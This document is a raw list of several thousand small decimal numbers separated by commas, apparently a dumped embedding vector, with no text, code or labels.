0.01569008268415928, 0.014993621967732906, -0.0014290590770542622, -0.004934360273182392, -0.002866331022232771, -0.00458284467458725, 0.008817458525300026, -0.016820190474390984, 0.025479959324002266, -0.010282655246555805, -0.006077607627958059, 0.027963565662503242, 0.00833125039935112, -0.002603515749797225, 0.0069448985159397125, 0.007621648255735636, -0.014231457374989986, 0.003994795028120279, -0.010887130163609982, -0.008002731017768383, -0.010131536051630974, 0.0042346143163740635, -0.006281289737671614, 0.003597286529839039, 0.04919905588030815, -0.0016089234268292785, -0.027648186311125755, 0.016241995617747307, -0.016294559463858604, -0.036978136748075485, -0.008206413127481937, -0.02314090169966221, -0.003288478357717395, 0.0001291491644224152, -0.0014495914801955223, 0.0032868359703570604, -0.01777946576476097, 0.024362992495298386, -0.0026330824475735426, -0.0013986710691824555, 0.010144677013158798, -0.026320967823266983, -0.0009691320010460913, 0.020394479855895042, 0.031932078301906586, 0.018528489395976067, -0.0007305448525585234, -0.020670436322689056, 0.010854278691112995, -0.017083004117012024, 0.01478336937725544, 0.008101286366581917, -0.009060562588274479, -0.0077530560083687305, -0.014862214215099812, -0.01504618488252163, -0.03939603641629219, 0.013732108287513256, -0.005144612863659859, 0.01563752070069313, 0.011445613577961922, -0.00973731279373169, 0.01275969110429287, 0.004484288860112429, -0.019514048472046852, -0.027069993317127228, -0.02425786666572094, -0.011944962665438652, -0.007687352132052183, 0.013929219916462898, -0.001962902955710888, 0.016609936952590942, -0.03553264960646629, 0.01780574768781662, 0.003643279429525137, 0.03316731005907059, 0.007542803883552551, 0.0013247542083263397, -0.02387678436934948, 0.01440228708088398, -0.005453420802950859, 0.0073259808123111725, 0.009172259829938412, -0.02170855738222599, 0.022562706843018532, -0.0011695288121700287, -0.0013025791849941015, -0.006760927848517895, 0.0110316788777709, -0.010295795276761055, -0.0007137082284316421, -0.007529662922024727, -0.04084152355790138, -0.01780574768781662, -0.013548136688768864, -0.010624314658343792, -0.007779337465763092, -0.00621230062097311, 0.02282552234828472, 0.015598097816109657, -0.01789773255586624, 0.008751754648983479, -0.029487894847989082, 0.00273492350243032, -0.0037286942824721336, 0.011241931468248367, -0.012358897365629673, 0.010131536051630974, -0.008541502058506012, -0.004369306843727827, 0.011419331654906273, -0.0014914777129888535, -0.008534932509064674, -0.020775562152266502, 0.019001558423042297, 0.012293193489313126, 0.003889668732881546, -0.023219745606184006, 0.008245835080742836, -0.0055716875940561295, -0.03361409902572632, -0.0020943107083439827, 0.02092011086642742, 0.008561213500797749, -0.000520703149959445, 0.007904174737632275, 0.008488939143717289, -0.01935635879635811, 0.02332487143576145, -0.0005018132505938411, 0.005003349389880896, 0.00277598830871284, 0.016386544331908226, -0.0027398511301726103, 0.025243425741791725, 0.02056531049311161, 0.02006596140563488, -0.0019136250484734774, 0.0068463427014648914, 0.025479959324002266, -0.015729505568742752, -0.005798365920782089, -0.0035578643437474966, 0.01742466539144516, 0.001655737403780222, 0.0037615462206304073, 0.012207778170704842, 0.021577149629592896, -0.007050024811178446, -0.0025131728034466505, -0.02825266309082508, 0.030723126605153084, 0.005187320057302713, -0.000376154639525339, 0.005417283624410629, -0.0030585150234401226, -0.03235258162021637, 0.0023801224306225777, -0.00551583943888545, -0.013219617307186127, 0.009724171832203865, -0.004362736828625202, 0.009619046002626419, 0.011373339220881462, 0.0076545001938939095, -0.02325916849076748, -0.03427113592624664, -0.005982337053865194, -0.005732662044465542, -0.0001089246870833449, -0.022155342623591423, -0.0014734092401340604, 0.011596731841564178, 0.021524585783481598, 0.010065832175314426, -0.00014116064994595945, -0.025716492906212807, 0.01756921410560608, 0.0004274857637938112, -0.014835933223366737, 0.004467862658202648, -0.014336583204567432, 0.011636154726147652, 0.024507541209459305, -0.0037845426704734564, -0.003912665415555239, -0.013436440378427505, -0.011327346786856651, -0.0011432472383603454, -0.022155342623591423, -0.01892271265387535, -0.004641978070139885, -0.024100176990032196, -0.006363419350236654, 0.00038580488762818277, 0.006839772220700979, 0.009172259829938412, 0.0012409817427396774, 0.021524585783481598, -0.0055749728344380856, -0.0005297374445945024, -0.0066065238788723946, -0.003293406218290329, -0.011143375188112259, -0.0017017300706356764, 0.03910693898797035, 0.013837234117090702, 0.015019903890788555, -0.00018407349125482142, -0.017595496028661728, 0.0017986432649195194, 0.007693922612816095, -0.007818760350346565, 0.036268532276153564, -0.0010487979743629694, 0.005121616180986166, 0.012851675972342491, 0.010098684579133987, -0.014954200014472008, -0.014678243547677994, -0.018199970945715904, -0.024625808000564575, -0.014704525470733643, 0.004730678163468838, -0.009481067769229412, -0.0011867760913446546, 0.004205047618597746, -0.01666250079870224, 0.019606033340096474, -0.0009313523187302053, 0.013048787601292133, 0.015453549101948738, 0.01818682998418808, 0.022602129727602005, -0.0017000875668600202, 0.022562706843018532, 0.018791304901242256, 0.011570450849831104, 0.017818888649344444, 0.011202509514987469, 0.026268405839800835, 0.0077924784272909164, -0.005187320057302713, -0.011011967435479164, -0.017109286040067673, 0.019619174301624298, 0.01315391343086958, 0.010177528485655785, -0.02199765481054783, -0.0028564755339175463, -0.003331186017021537, 0.004727392923086882, -0.0058049364015460014, 0.0107228709384799, -0.005952770356088877, 0.011458754539489746, -0.013029076159000397, 0.0011596732074394822, 0.008692621253430843, -0.02701742947101593, 0.008022441528737545, -0.017122427001595497, -0.003410030622035265, 0.0011662435717880726, 0.01654423400759697, -0.004448151681572199, -0.013081640005111694, 0.004441581200808287, 0.015111888758838177, 0.014704525470733643, -0.00242775771766901, -0.0028219809755682945, -0.028620604425668716, -0.007148580625653267, 0.004119632299989462, -0.010203810408711433, 0.0061893039382994175, -0.013101350516080856, 0.002251999918371439, 0.017884591594338417, -0.00739168468862772, 0.006833202205598354, -0.00643897894769907, 0.017608635127544403, -0.014941059052944183, -0.004776671063154936, 0.015545534901320934, 0.0067937797866761684, -0.006429123226553202, -0.0030289480928331614, -0.01141276117414236, 0.011071101762354374, 0.011806984432041645, -0.0006705900887027383, 0.007299699354916811, -0.007989590056240559, -0.00006909172225277871, 0.0066985092125833035, -0.00001079237335943617, 0.012943661771714687, -0.0025148154236376286, -0.014073767699301243, 0.015295859426259995, -0.0018364230636507273, -0.0032326302025467157, 0.0442318432033062, 0.0037516907323151827, 0.0038798132445663214, 0.010946263559162617, 0.00204667542129755, -0.004822663497179747, -0.00211894977837801, -0.003214561613276601, 0.015243296511471272, -0.0054764170199632645, 0.002910681301727891, 0.00411306181922555, -0.014270879328250885, 0.014415428042411804, 0.00593305891379714, -0.026360390707850456, -0.01706986501812935, -0.005883781239390373, 0.005749088246375322, -0.013837234117090702, -0.01654423400759697, 0.015492971055209637, -0.0011046462459489703, -0.021143503487110138, 0.00636670459061861, -0.017174990847706795, -0.02285180427134037, -0.02168227545917034, 0.003181709675118327, 0.02956673875451088, -0.01292395032942295, 0.009619046002626419, -0.0015276148915290833, -0.019224951043725014, -0.015059325844049454, -0.005302302073687315, -0.005420568864792585, 0.013160483911633492, -0.00840352475643158, -0.01488849613815546, 0.0017083005513995886, -0.009389081969857216, 0.0036761313676834106, 0.012477164156734943, 0.02951417677104473, -0.010230091400444508, -0.00026794857694767416, -0.02059159055352211, -0.0010101969819515944, -0.010473196394741535, -0.001658201334066689, 0.01452055387198925, 0.005456706043332815, -0.017753183841705322, 0.012792542576789856, 0.021485164761543274, -0.017740042880177498, -0.03458651527762413, 0.0038798132445663214, 0.003273695008829236, -0.023653391748666763, -0.003104507690295577, 0.001888986094854772, -0.0020138234831392765, 0.020841266959905624, -0.01933007687330246, 0.018554771319031715, -0.010525759309530258, 0.003892953973263502, 0.019514048472046852, -0.018081704154610634, 0.008909444324672222, -0.017766324803233147, 0.02880457416176796, -0.009369371458888054, -0.014481131918728352, 0.009007999673485756, -0.005568402819335461, -0.007555944379419088, -0.029409050941467285, 0.0010644026333466172, -0.00416562519967556, -0.008456087671220303, 0.009027711115777493, 0.01742466539144516, 0.011806984432041645, -0.015295859426259995, 0.03613712638616562, -0.011025108397006989, 0.019224951043725014, -0.0015736075583845377, 0.021695416420698166, 0.005568402819335461, -0.00412948802113533, 0.020276213064789772, 0.001173635246232152, 0.006964609958231449, -0.002002325374633074, 0.02616328001022339, 0.007680781651288271, 0.011038249358534813, 0.0040112207643687725, 0.010368069633841515, 0.015624378807842731, -0.015742646530270576, -0.00701060239225626, 0.026347249746322632, 0.027148837223649025, -0.012299763970077038, 0.006570386700332165, 0.0032326302025467157, -0.024928046390414238, -0.015834631398320198, -0.022405019029974937, 0.014441709965467453, -0.0021041661966592073, -0.026123857125639915, 0.00047347848885692656, 0.012332615442574024, -0.0002806787088047713, 0.0054797022603452206, -0.018397081643342972, 0.0006652516312897205, -0.011182798072695732, 0.0016606651479378343, -0.013968641869723797, 0.014336583204567432, -0.018962135538458824, 0.018620476126670837, 0.007214284501969814, 0.007509951945394278, 0.017621776089072227, -0.011741280555725098, -0.025217143818736076, -0.009297097101807594, -0.00041352369589731097, 0.006228726357221603, 0.022602129727602005, 0.012753120623528957, -0.008423235267400742, 0.0045762741938233376, 0.008626917377114296, 0.012779401615262032, 0.0033804639242589474, 0.003814109368249774, -0.01004612073302269, 0.02475721575319767, -0.009198540821671486, 0.024691512808203697, -0.016150010749697685, -0.016596795991063118, 0.0015276148915290833, -0.009336519055068493, 0.027332808822393417, -0.003735264763236046, -0.008508650586009026, 0.02475721575319767, -0.008390383794903755, -0.010000128298997879, 0.012812254019081593, -0.012575719505548477, -0.01306849904358387, 0.012523156590759754, 0.0221159216016531, -0.02906738966703415, -0.022654693573713303, -0.03235258162021637, 0.005197175778448582, 0.018383940681815147, 0.026596924290060997, 0.0091656893491745, 0.004218188114464283, -0.00002036563091678545, -0.035953156650066376, -0.004208332393318415, -0.01968487724661827, -0.007490240503102541, -0.023101478815078735, 0.035769183188676834, 0.01780574768781662, -0.016241995617747307, -0.012378607876598835, 0.011011967435479164, 0.021012095734477043, -0.005877210758626461, -0.0007946061086840928, -0.014178894460201263, 0.014165753498673439, -0.01777946576476097, 0.004247754812240601, -0.016465388238430023, -0.006314141675829887, 0.004004650749266148, -0.013613840565085411, 0.0024014762602746487, -0.015098748728632927, 0.0017855025362223387, -0.03358781710267067, 0.007910745218396187, 0.00878460705280304, 0.016412826254963875, 0.031143631786108017, 0.004057213664054871, 0.004526996519416571, 0.00712886918336153, -0.01747722737491131, 0.010827996768057346, -0.005745803005993366, -0.0032293449621647596, 0.0005100262351334095, 0.030933380126953125, -0.021156644448637962, 0.008896303363144398, -0.0019399066222831607, 0.005315442569553852, -0.013850375078618526, -0.015571815893054008, -0.012884528376162052, 0.019671738147735596, 0.005272735375910997, -0.02147202380001545, -0.0033968898933380842, 0.040289610624313354, 0.005141327623277903, -0.02106465958058834, 0.0053285835310816765, 0.0028039123862981796, -0.02325916849076748, 0.005236598197370768, 0.015361563302576542, -0.004464577883481979, -0.0036892720963805914, -0.017608635127544403, -0.00902114063501358, -0.012693987227976322, 0.005542120896279812, 0.004418584983795881, -0.009507349692285061, 0.00596919609233737, -0.0246126689016819, -0.011839836835861206, 0.005358150228857994, 0.02088068798184395, 0.005354864988476038, 0.0043298848904669285, -0.006728075910359621, 0.01412633154541254, -0.014822792261838913, -0.010644026100635529, 0.0012491947272792459, -0.03768773749470711, 0.0042444695718586445, -0.005216886755079031, -0.0059987627901136875, -0.018778163939714432, 0.027674468234181404, 0.021813683211803436, -0.00011036196519853547, 0.017845170572400093, 0.012930520810186863, 0.008837169967591763, -0.01973744109272957, 0.012713697738945484, -0.011590162292122841, 0.007188003044575453, -0.0120106665417552, 0.016176290810108185, 0.0005802472587674856, -0.01299622468650341, 0.000452535372460261, -0.006143311504274607, -0.008482368662953377, -0.011563880369067192, -0.016557374969124794, 0.002567378571256995, -0.022812381386756897, -0.027832157909870148, 0.03332500159740448, -0.014822792261838913, -0.022194765508174896, 0.023154042661190033, 0.012326044961810112, 0.0002511119528207928, -0.006209015380591154, 0.002483606105670333, -0.012713697738945484, -0.006622949615120888, -0.023285450413823128, 0.0016228854656219482, -0.0033016193192452192, 0.007371973711997271, 0.024980610236525536, 0.013311603106558323, -0.01935635879635811, -0.0018314952030777931, -0.029645584523677826, -0.01768748089671135, 0.006678797770291567, 0.00038744747871533036, 0.002930392511188984, 0.02906738966703415, -0.03103850595653057, -0.011340486817061901, -0.022602129727602005, -0.04063127189874649, 0.00492778979241848, 0.001810141489841044, -0.003952087368816137, -0.008935725316405296, 0.0032802654895931482, 0.012082940898835659, 0.018331378698349, -0.005532265640795231, -0.02880457416176796, -0.008015871979296207, -0.012562579475343227, -0.017910873517394066, 0.008705762214958668, 0.002789129037410021, -0.021196067333221436, 0.0034395973198115826, -0.022956930100917816, -0.01478336937725544, -0.008528362028300762, -0.0007781801396049559, 0.013272181153297424, -0.014730806462466717, -0.010072402656078339, 0.009803016670048237, 0.014757088385522366, -0.019461484625935555, 0.02604501135647297, 0.02470465376973152, -0.01680704951286316, 0.008580924943089485, -0.004464577883481979, 0.01739838346838951, 0.005844358820468187, -0.00301087973639369, 0.006721505429595709, 0.00035192634095437825, 0.03968513384461403, -0.01424459833651781, 0.01122222002595663, 0.0019201954128220677, -0.0038502465467900038, -0.01675448566675186, 0.01968487724661827, 0.008916014805436134, 0.005302302073687315, 0.01084113772958517, -0.0007744843023829162, 0.007588796317577362, -0.012017237022519112, -0.008383813314139843, -0.02382422238588333, -0.025677070021629333, 0.005936344154179096, 0.02021050825715065, 0.00420176237821579, -0.005749088246375322, 0.003955372609198093, 0.010387781076133251, 0.014993621967732906, -0.002886042231693864, -0.016478529199957848, -0.008357531391084194, -0.009849009104073048, -0.011517887935042381, 0.013784671202301979, -0.0077004930935800076, 0.026426095515489578, -0.05435023829340935, 0.013981782831251621, 0.007621648255735636, -0.011714999563992023, -0.018909571692347527, 0.001289438339881599, -0.014507413841784, -0.011143375188112259, -0.0023407002445310354, -0.023981910198926926, -0.002491819206625223, -0.0023357723839581013, -0.0011284638894721866, 0.005453420802950859, 0.00636670459061861, -0.008679480291903019, 0.005322013050317764, 0.009185400791466236, -0.015361563302576542, 0.010157817974686623, -0.0026708622463047504, -0.006760927848517895, -0.019224951043725014, 0.0034790197387337685, 0.02176111936569214, -0.03282565250992775, -0.011872688308358192, -0.014967340975999832, 0.014034345746040344, -0.0014668387593701482, 0.0010118394857272506, -0.008778036572039127, -0.020394479855895042, -0.018357660621404648, -0.013784671202301979, -0.010538900271058083, -0.010144677013158798, -0.009875291027128696, 0.03214232996106148, -0.00258544716052711, -0.010683448985219002, 0.02176111936569214, -0.002393263392150402, -0.009040852077305317, -0.004651833791285753, -0.014757088385522366, -0.006833202205598354, 0.008048723451793194, -0.022602129727602005, -0.010400922037661076, -0.004760244861245155, -0.006317426450550556, -0.005101905204355717, 0.0016294558299705386, 0.021866247057914734, -0.0004028468392789364, 0.014376006089150906, -0.003925805911421776, -0.016294559463858604, -0.01804228127002716, 0.010157817974686623, -0.0068069202825427055, 0.00470111146569252, 0.009415363892912865, -0.0023029204457998276, -0.027569342404603958, -0.018962135538458824, -0.014481131918728352, -0.016360262408852577, -0.011255072429776192, -0.02678089588880539, -0.018948994576931, -0.02534855157136917, 0.019500907510519028, 0.003066727891564369, 0.003626853460446, 0.023627109825611115, 0.028883419930934906, -0.023429999127984047, -0.006734646391123533, 0.006609808653593063, -0.009704461321234703, -0.012608571909368038, 0.01067687850445509, -0.013968641869723797, -0.0056702434085309505, -0.016583655029535294, 0.02977699227631092, 0.0024179022293537855, -0.02687288075685501, -0.022983212023973465, -0.008285257034003735, -0.01718813180923462, -0.03187951445579529, -0.009126266464591026, 0.001964545575901866, 0.02021050825715065, 0.007766196969896555, -0.01155730988830328, 0.0012229131534695625, 0.006524393800646067, 0.020867547020316124, -0.006977750454097986, 0.010782004334032536, -0.0013058643089607358, 0.011787273921072483, -0.005072338506579399, -0.001962902955710888, -0.005246453452855349, 0.03082825429737568, 0.014494272880256176, 0.006767498329281807, -0.014178894460201263, -0.004825948737561703, -0.002672504633665085, 0.012266911566257477, -0.00860720593482256, 0.019842566922307014, -0.02111722156405449, -0.017122427001595497, -0.007043454330414534, -0.011314205825328827, 0.018147407099604607, 0.010479766875505447, -0.011728139594197273, 0.012562579475343227, -0.00803558249026537, -0.008239264599978924, -0.010873990133404732, -0.005256309174001217, 0.025151439011096954, 0.0017115856753662229, -0.03282565250992775, -0.008889732882380486, -0.02883085608482361, 0.017240693792700768, -0.00041578226955607533, 0.021038377657532692, -0.011373339220881462, -0.010663737542927265, 0.018121125176548958, -0.0009559912141412497, 0.022891227155923843, -0.004034217447042465, 0.024954328313469887, -0.0009748811135068536, -0.009191970340907574, 0.00799616053700447, 0.004661689046770334, 0.016938457265496254, 0.019435202702879906, 0.009612475521862507, 0.0016729846829548478, -0.0017214412800967693, 0.015913475304841995, 0.008942295797169209, -0.009106555953621864, 0.014008063822984695, 0.014638821594417095, 0.0017033726908266544, -0.002894255332648754, -0.005213601514697075, -0.013929219916462898, 0.013994923792779446, 0.0028252662159502506, -0.02801612764596939, -0.002097595948725939, 0.0023423428647220135, 0.0035611495841294527, 0.01718813180923462, -0.0031537855975329876, 0.015217015519738197, -0.013981782831251621, 0.012943661771714687, 0.007036883849650621, -0.01162958424538374, -0.00005795286415377632, -0.01258228998631239, -0.008357531391084194, -0.018107986077666283, -0.0045302812941372395, -0.012818824499845505, -0.01503304485231638, -0.022549565881490707, 0.0033673231955617666, -0.01889643259346485, 0.0013633552007377148, -0.01892271265387535, 0.019014699384570122, -0.020762421190738678, -0.017648058012127876, -0.019238092005252838, 0.003204706124961376, -0.0030322333332151175, 0.02563764899969101, -0.040499862283468246, -0.011156516149640083, -0.016531093046069145, -0.0023062056861817837, 0.0164259672164917, -0.0002759562339633703, -0.007319410797208548, 0.013291891664266586, -0.01542726717889309, -0.0058936369605362415, -0.00875832512974739, 0.004116347059607506, 0.014546835795044899, -0.002927107270807028, -0.001291080960072577, -0.025440536439418793, -0.005640676710754633, -0.000294230121653527, -0.01618943177163601, -0.0044777183793485165, -0.0006529321544803679, -0.022129062563180923, 0.009757024236023426, -0.0017444376135244966, -0.016793908551335335, -0.012608571909368038, -0.016938457265496254, -0.003528297645971179, -0.0072208549827337265, 0.025966167449951172, -0.0041393437422811985, -0.000846758543048054, 0.016964737325906754, 0.0035940015222877264, 0.000185716082341969, -0.01830509677529335, -0.006107174325734377, -0.0021041661966592073, 0.005062482785433531, -0.018147407099604607, -0.000016066647731349804, -0.0006644303211942315, -0.002546024741604924, -0.005923203658312559, 0.018331378698349, -0.0012204493395984173, 0.008318109437823296, 0.009500779211521149, 0.005883781239390373, -0.00897514820098877, 0.0008180130971595645, -0.002771060448139906, -0.016386544331908226, 0.0027480642311275005, -0.0047109671868383884, -0.007286558859050274, 0.0025493099819868803, 0.011465324088931084, -0.005180749576538801, 0.011951533146202564, 0.03103850595653057, -0.0007490240386687219, -0.013534996658563614, -0.0005363078089430928, 0.011537598446011543, 0.005059197545051575, -0.013718967325985432, -0.0002112789952661842, -0.0044810036197304726, 0.012017237022519112, -0.00009788849274627864, 0.010138106532394886, -0.0258479006588459, -0.001542398240417242, -0.016097446903586388, -0.02159029059112072, 0.0034001751337200403, 0.0006492363172583282, 0.009349660016596317, 0.006951468996703625, -0.008672909811139107, 0.0011867760913446546, -0.0012647993862628937, -0.024533823132514954, 0.004996778909116983, -0.007247136440128088, 0.0014142757281661034, 0.006534249521791935, 0.007339121773838997, -0.010755722410976887, -0.007917315699160099, -0.005788510665297508, -0.018239393830299377, 0.009027711115777493, -0.015834631398320198, 0.00492778979241848, -0.016596795991063118, 0.00048456600052304566, -0.015729505568742752, 0.009796446189284325, 0.02375851757824421, -0.0021041661966592073, -0.017871450632810593, -0.009126266464591026, 0.009684749878942966, 0.012503445148468018, 0.018909571692347527, 0.015400986187160015, 0.010164388455450535, 0.008160419762134552, 0.01939578168094158, 0.009881861507892609, -0.016675641760230064, 0.00008828956924844533, -0.027359088882803917, -0.000049200902140000835, 0.004047357942909002, -0.0006652516312897205, 0.0026527936570346355, 0.004825948737561703, 0.0062747192569077015, 0.01352185569703579, -0.003955372609198093, -0.002389978151768446, -0.025335410609841347, -0.005197175778448582, 0.02111722156405449, 0.012017237022519112, 0.010111824609339237, -0.028384068980813026, 0.020788703113794327, -0.011261642910540104, -0.0035611495841294527, -0.001851206412538886, -0.019027840346097946, -0.006879194639623165, 0.010368069633841515, 0.010584892705082893, -0.01859419420361519, -0.0014348081313073635, -0.009638757444918156, -0.015479831025004387, 0.016268277540802956, 0.013968641869723797, -0.01675448566675186, 0.009862150065600872, -0.003492160467430949, 0.005368005950003862, 0.006261578295379877, -0.0012615142622962594, -0.001829852699302137, -0.003257269039750099, 0.0020516032818704844, -0.030907098203897476, -0.014980481006205082, 0.002391620771959424, -0.01789773255586624, -0.00739168468862772, -0.009303667582571507, -0.0006775711080990732, 0.010210380889475346, 0.004940930753946304, 0.03737235814332962, 0.010729441419243813, 0.021025236696004868, -0.008232694119215012, 0.012575719505548477, 0.01428402028977871, -0.013718967325985432, 0.0008221195894293487, -0.0053712911903858185, -0.018883291631937027, 0.012674275785684586, -0.012023807503283024, -0.010598033666610718, 0.0028794719837605953, 0.025650789961218834, -0.01500676292926073, 0.01721441186964512, -0.01904097944498062, 0.022273611277341843, 0.0004582844558171928, 0.01216178573668003, 0.02244444005191326, -0.021104082465171814, 0.014008063822984695, -0.0046715447679162025, 0.012464023195207119, -0.014586257748305798, 0.004034217447042465, -0.013351025059819221, 0.01424459833651781, -0.00674778688699007, 0.017030442133545876, -0.004293747711926699, 0.007825330831110477, 0.040053077042102814, -0.008272117003798485, -0.027385370805859566, -0.034744203090667725, 0.006113744806498289, -0.008955436758697033, 0.026412954553961754, 0.018528489395976067, -0.0033968898933380842, 0.005446850322186947, 0.0076019372791051865, 0.0038568167947232723, 0.01701730117201805, -0.01042720302939415, 0.015177592635154724, 0.0009132837294600904, -0.01675448566675186, 0.007595366798341274, -0.009099985472857952, -0.000376154639525339, 0.013626981526613235, 0.005108475685119629, 0.015125029720366001, -0.016977878287434578, 0.002276638988405466, -0.002385050291195512, -0.016123728826642036, -0.004842374939471483, -0.015795208513736725, -0.015282719396054745, -0.0020959533285349607, 0.002393263392150402, 0.006596668157726526, -0.011163086630403996, -0.012450882233679295, 0.0053285835310816765, 0.0033081895671784878, 0.006225441116839647, -0.01680704951286316, 0.00977016519755125, -0.011445613577961922, 0.003912665415555239, -0.00466497428715229, 0.0057950811460614204, 0.036662757396698, 0.002467180136591196, -0.010203810408711433, -0.02502003125846386, -0.017713762819767, 0.016609936952590942, 0.007733345031738281, -0.003948802128434181, -0.01185297779738903, -0.0028794719837605953, -0.008147279731929302, 0.004168910440057516, 0.009500779211521149, -0.016623077914118767, 0.0026363676879554987, 0.014993621967732906, -0.016241995617747307, -0.013587559573352337, 0.002481963485479355, 0.006186019163578749, 0.027148837223649025, -0.006238582078367472, -0.024126458913087845, -0.0022848518565297127, 0.012707127258181572, -0.0009141050395555794, -0.0020713142585009336, -0.0163734033703804, 0.016793908551335335, -0.011931821703910828, -0.008699191734194756, -0.010328647680580616, -0.009986987337470055, -0.022286750376224518, 0.0055224099196493626, -0.01701730117201805, 0.008318109437823296, 0.025532521307468414, -0.012845105491578579, 0.006534249521791935, 0.019461484625935555, 0.01440228708088398, 0.004513855557888746, 0.0026297972071915865, -0.020841266959905624, -0.007069735787808895, 0.007233995478600264, -0.0061794486828148365, 0.008219553157687187, -0.018015999346971512, -0.009487638249993324, 0.00257723405957222, 0.0019037695601582527, 0.016912175342440605, 0.014481131918728352, 0.0019431918626651168, 0.010578322224318981, -0.014927918091416359, -0.0208544060587883, 0.0036137124989181757, 0.0002901236293837428, -0.0091656893491745, 0.0013830664101988077, -0.021077800542116165, 0.007050024811178446, -0.014086908660829067, 0.015584956854581833, -0.010782004334032536, -0.0014101691776886582, 0.0214457418769598, -0.010177528485655785, -0.005837788339704275, -0.00954677164554596, 0.0034395973198115826, 0.010663737542927265, -0.013942359946668148, -0.010847708210349083, -0.004359451588243246, -0.025125158950686455, -0.018094845116138458, -0.001236053998582065, -0.025151439011096954, 0.0047668153420090675, -0.013101350516080856, 0.016675641760230064, -0.02728024497628212, 0.008679480291903019, 0.019146107137203217, 0.009375941939651966, 0.016701921820640564, 0.008114427328109741, -0.005082194227725267, 0.006307571195065975, 0.009310238063335419, 0.012273482047021389, -0.012536297552287579, 0.001252479967661202, -0.008870021440088749, -0.02030249498784542, 0.0064225527457892895, -0.010742582380771637, 0.015177592635154724, 0.012444311752915382, -0.0020171087235212326, -0.0021435886155813932, -0.0030765836127102375, 0.002817053347826004, -0.012884528376162052, 0.005299016833305359, 0.003387034172192216, -0.007450818549841642, -0.005929773673415184, 0.013285321183502674, 0.0010537257185205817, 0.007161721121519804, 0.030171215534210205, 0.022667832672595978, 0.011156516149640083, 0.010348359122872353, -0.006317426450550556, 0.005354864988476038, 0.00932994857430458, 0.019316935911774635, -0.021984513849020004, 0.02754306048154831, 0.007529662922024727, 0.004513855557888746, 0.0028794719837605953, -0.004313458688557148, -0.023403717204928398, 0.018081704154610634, -0.017963437363505363, 0.015479831025004387, 0.0064126974903047085, 0.01478336937725544, -0.009132836945354939, 0.0022881370969116688, 0.006527679041028023, 0.009007999673485756, -0.0081867016851902, -0.03437626361846924, -0.0010611173929646611, -0.02982955425977707, -0.01671506278216839, -0.004990208428353071, -0.019251232966780663, -0.004540137015283108, -0.006852913182228804, 0.01311449147760868, -0.0008796104812063277, 0.0027053565718233585, -0.008383813314139843, 0.015492971055209637, -0.005213601514697075, -0.00489165261387825, 0.010098684579133987, 0.006445549428462982, -0.014546835795044899, 0.01909354329109192, 0.0082261236384511, 0.0327468067407608, 0.0065079680643975735, -0.02616328001022339, -0.006800350267440081, -0.004674830008298159, -0.002964886836707592, -0.0015235083410516381, 0.006442264188081026, -0.0070303138345479965, 0.0097833052277565, 0.0018955565756186843, 0.02170855738222599, 0.004740533884614706, -0.0014594470849260688, -0.006268148776143789, 0.0021173071581870317, -0.0023160611744970083, 0.013469292782247066, 0.009566483087837696, 0.017884591594338417, -0.009185400791466236, -0.005956055596470833, 0.006826631724834442, 0.02173483930528164, -0.010979115962982178, 0.002810482867062092, -0.010157817974686623, 0.0010529044084250927, -0.016031743958592415, -0.018725601956248283, -0.008732044138014317, 0.03411344811320305, 0.0003591126878745854, 0.02287808619439602, -0.01701730117201805, -0.009290526621043682, 0.012746550142765045, 0.01613686978816986, -0.022654693573713303, -0.021550867706537247, 0.0017033726908266544, -0.030250059440732002, -0.00016918744950089604, 0.0018544916529208422, 0.007575655821710825, -0.0052858758717775345, -0.019146107137203217, -0.00909341499209404, -0.001654916093684733, 0.0008418307988904417, 0.00014783369260840118, 0.003626853460446, 0.01854163035750389, 0.03763517364859581, 0.029225079342722893, 0.006675512529909611, -0.0014200247824192047, -0.011544168926775455, -0.016123728826642036, -0.015440408140420914, -0.008810888044536114, -0.014494272880256176, 0.01889643259346485, 0.014507413841784, -0.0004603377019520849, 0.009034281596541405, 0.016793908551335335, -0.02194509096443653, -0.0009872005321085453, -0.005400857888162136, 0.005029630847275257, 0.0005991370999254286, -0.0013756747357547283, 0.005788510665297508, -0.018633617088198662, 0.015584956854581833, -0.035480085760354996, -0.007799048908054829, -0.008554643020033836, 0.018554771319031715, -0.00006955370190553367, 0.0012023807503283024, 0.005729377269744873, 0.0056603881530463696, 0.008672909811139107, -0.0025542378425598145, -0.00806843489408493, -0.006018474232405424, 0.032957058399915695, 0.03182695060968399, 0.019290653988718987, 0.026097575202584267, 0.015440408140420914, -0.013679544441401958, 0.014980481006205082, 0.0036662756465375423, 0.0028285514563322067, 0.023403717204928398, -0.0011054675560444593, -0.019671738147735596, 0.00517089432105422, -0.007628218736499548, 0.01563752070069313, -0.007713633589446545, -0.009573053568601608, -0.0009707746212370694, -0.027674468234181404, 0.023981910198926926, 0.0052760206162929535, -0.00041783551569096744, -0.007542803883552551, -0.014060627669095993, 0.011084241792559624, -0.010216951370239258, -0.026439234614372253, 0.009980416856706142, -0.007371973711997271, -0.01985570788383484, -0.003198135644197464, 0.012726838700473309, -0.009086844511330128, 0.019106684252619743, -0.006537534762173891, -0.006448834203183651, 0.024362992495298386, 0.02649179846048355, 0.00007863931386964396, -0.017411524429917336, 0.007036883849650621, -0.03366665914654732, 0.0007272596703842282, 0.005391002167016268, 0.00847579911351204, -0.007628218736499548, -0.007142010144889355, -0.018751883879303932, -0.005220171995460987, -0.0020072530023753643, -0.0034395973198115826, 0.018870150670409203, -0.00407692464068532, -0.013850375078618526, -0.0015382918063551188, -0.02311461977660656, -0.015584956854581833, 0.015164452604949474, 0.004967212211340666, 0.02385050244629383, -0.004214902874082327, 0.011255072429776192, 0.007477100007236004, -0.0020532459020614624, 0.016360262408852577, 0.006107174325734377, -0.0040539284236729145, 0.0021468738559633493, -0.029382769018411636, 0.0016335623804479837, -0.002353840973228216, -0.0028055550064891577, -0.010131536051630974, 0.022405019029974937, -0.0024162596091628075, 0.004819378722459078, -0.01865989714860916, 0.0078778937458992, 0.008896303363144398, -0.000924781896173954, 0.027674468234181404, -0.0024934615939855576, -0.012089511379599571, 0.011695288121700287, -0.004845660179853439, 0.017740042880177498, -0.012332615442574024, -0.006478401366621256, 0.013213047757744789, 0.009362800978124142, 0.004914649296551943, -0.00959276407957077, -0.01607116498053074, -0.021629711613059044, -0.0038765280041843653, 0.004595985170453787, -0.018265673890709877, -0.00498035317286849, 0.00010748741624411196, 0.00133132457267493, -0.008659769780933857, 0.012017237022519112, -0.0005375397740863264, 0.0060841781087219715, -0.003525012405589223, 0.0034034601412713528, -0.013429869897663593, 0.017713762819767, 0.00048292340943589807, -0.0020121808629482985, -0.005509268958121538, -0.018357660621404648, -0.021340616047382355, 